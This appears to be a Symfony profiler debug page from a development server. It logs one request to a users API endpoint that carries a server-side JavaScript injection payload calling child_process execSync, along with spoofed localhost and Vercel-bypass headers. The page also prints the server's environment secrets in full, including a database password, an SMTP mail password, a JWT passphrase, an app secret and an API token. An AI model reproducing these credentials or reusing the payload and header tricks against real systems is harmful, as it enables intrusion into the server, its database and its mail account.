n/a
Request
GET Parameters
| Key | Value |
|---|---|
| $where | "this.constructor.constructor('return process.mainModule.require("child_process").execSync(decodeURIComponent("id")).toString()')()" |
POST Parameters
No POST parameters
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _api_collection_operation_name | "get" |
| _api_exception_to_status | [] |
| _api_has_composite_identifier | false |
| _api_identifiers | [
"id"
] |
| _api_operation_name | "api_users_get_collection" |
| _api_resource_class | "App\Entity\User" |
| _controller | "api_platform.action.get_collection" |
| _firewall_context | "security.firewall.map.context.api" |
| _format | null |
| _fos_rest_zone | true |
| _links | Symfony\Component\WebLink\GenericLinkProvider {#1022 -links: [ 1021 => Symfony\Component\WebLink\Link {#1021 -href: "https://falcon-dev.gorillas.dev/api/docs.jsonld" -rel: [ "http://www.w3.org/ns/hydra/core#apiDocumentation" => "http://www.w3.org/ns/hydra/core#apiDocumentation" ] -attributes: [] } ] } |
| _route | "api_users_get_collection" |
| _route_params | [ "_format" => null "_stateless" => null "_api_resource_class" => "App\Entity\User" "_api_identifiers" => [ "id" ] "_api_has_composite_identifier" => false "_api_exception_to_status" => [] "_api_operation_name" => "api_users_get_collection" "_api_collection_operation_name" => "get" ] |
| _stateless | null |
| _stopwatch_token | "476fe2" |
| media_type | "application/json" |
Request Headers
| Header | Value |
|---|---|
| accept | "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8" |
| cache-control | "no-cache, no-store, must-revalidate" |
| connection | "keep-alive" |
| host | "falcon-dev.gorillas.dev" |
| pragma | "no-cache" |
| upgrade-insecure-requests | "1" |
| user-agent | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" |
| x-client-ip | "127.0.0.1" |
| x-forwarded-for | "127.0.0.1" |
| x-originating-ip | "127.0.0.1" |
| x-php-ob-level | "1" |
| x-real-ip | "127.0.0.1" |
| x-vercel-protection-bypass | "true" |
| x-vercel-skip-toolbar | "1" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "application/json" |
| date | "Wed, 29 Apr 2026 15:11:42 GMT" |
| link | "<https://falcon-dev.gorillas.dev/api/docs.jsonld>; rel="http://www.w3.org/ns/hydra/core#apiDocumentation"" |
| www-authenticate | "Bearer" |
| x-debug-token | "ff97cb" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_ENV | "dev" |
| APP_SECRET | "56e35de529ff085473f28a5deda176d3" |
| CORS_ALLOW_ORIGIN | "^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$" |
| DATABASE_URL | "mysql://dev:v8YAepGFXafrtTZ@localhost:3306/dev" |
| EMAIL_SENDER | "dev.falken@gmail.com" |
| HARVEST_ACTION | "process-main-api" |
| HARVEST_API_URL | "https://harvest-dev.gorillas.dev" |
| HARVEST_TOKEN | "wejdz" |
| JWT_PASSPHRASE | "c9e6e27a4ebc1fac07b02036147407fe480aa75c486326a2092190c04dce5e9a" |
| JWT_PUBLIC_KEY | "%kernel.project_dir%/config/jwt/public.pem" |
| JWT_SECRET_KEY | "%kernel.project_dir%/config/jwt/private.pem" |
| MAILER_DSN | "smtp://dev.falken@gmail.com:ymdbomxpngbmqmac@smtp.gmail.com:465" |
| MESSENGER_TRANSPORT_DSN | "doctrine://default?auto_setup=0" |
| SYMFONY_ALFEN_RETURN_URL | "https://falcon-dev.gorillas.dev" |
| WKHTMLTOIMAGE_PATH | "/usr/local/bin/wkhtmltoimage" |
| WKHTMLTOPDF_PATH | "/home/dev/www/test/vendor/h4cc/wkhtmltopdf-amd64/bin/wkhtmltopdf-amd64" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "" |
| CONTENT_TYPE | "" |
| DOCUMENT_ROOT | "/home/dev/www/dev/public" |
| DOCUMENT_URI | "/index.php" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HOME | "/home/dev" |
| HTTPS | "on" |
| HTTP_ACCEPT | "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8" |
| HTTP_CACHE_CONTROL | "no-cache, no-store, must-revalidate" |
| HTTP_CONNECTION | "keep-alive" |
| HTTP_HOST | "falcon-dev.gorillas.dev" |
| HTTP_PRAGMA | "no-cache" |
| HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
| HTTP_USER_AGENT | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" |
| HTTP_X_CLIENT_IP | "127.0.0.1" |
| HTTP_X_FORWARDED_FOR | "127.0.0.1" |
| HTTP_X_ORIGINATING_IP | "127.0.0.1" |
| HTTP_X_REAL_IP | "127.0.0.1" |
| HTTP_X_VERCEL_PROTECTION_BYPASS | "true" |
| HTTP_X_VERCEL_SKIP_TOOLBAR | "1" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "%24where=this.constructor.constructor(%27return%20process.mainModule.require(%22child_process%22).execSync(decodeURIComponent(%22id%22)).toString()%27)()" |
| REDIRECT_STATUS | "200" |
| REMOTE_ADDR | "77.83.39.167" |
| REMOTE_PORT | "57134" |
| REMOTE_USER | "" |
| REQUEST_METHOD | "GET" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1777475502 |
| REQUEST_TIME_FLOAT | 1777475502.8618 |
| REQUEST_URI | "/api/users?%24where=this.constructor.constructor(%27return%20process.mainModule.require(%22child_process%22).execSync(decodeURIComponent(%22id%22)).toString()%27)()" |
| SCRIPT_FILENAME | "/home/dev/www/dev/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "10.19.93.2" |
| SERVER_NAME | "falcon-dev.gorillas.dev" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SOFTWARE | "nginx/1.18.0" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,JWT_SECRET_KEY,JWT_PUBLIC_KEY,JWT_PASSPHRASE,CORS_ALLOW_ORIGIN,MESSENGER_TRANSPORT_DSN,WKHTMLTOPDF_PATH,WKHTMLTOIMAGE_PATH,MAILER_DSN,EMAIL_SENDER,HARVEST_API_URL,HARVEST_ACTION,HARVEST_TOKEN,SYMFONY_ALFEN_RETURN_URL" |
| USER | "dev" |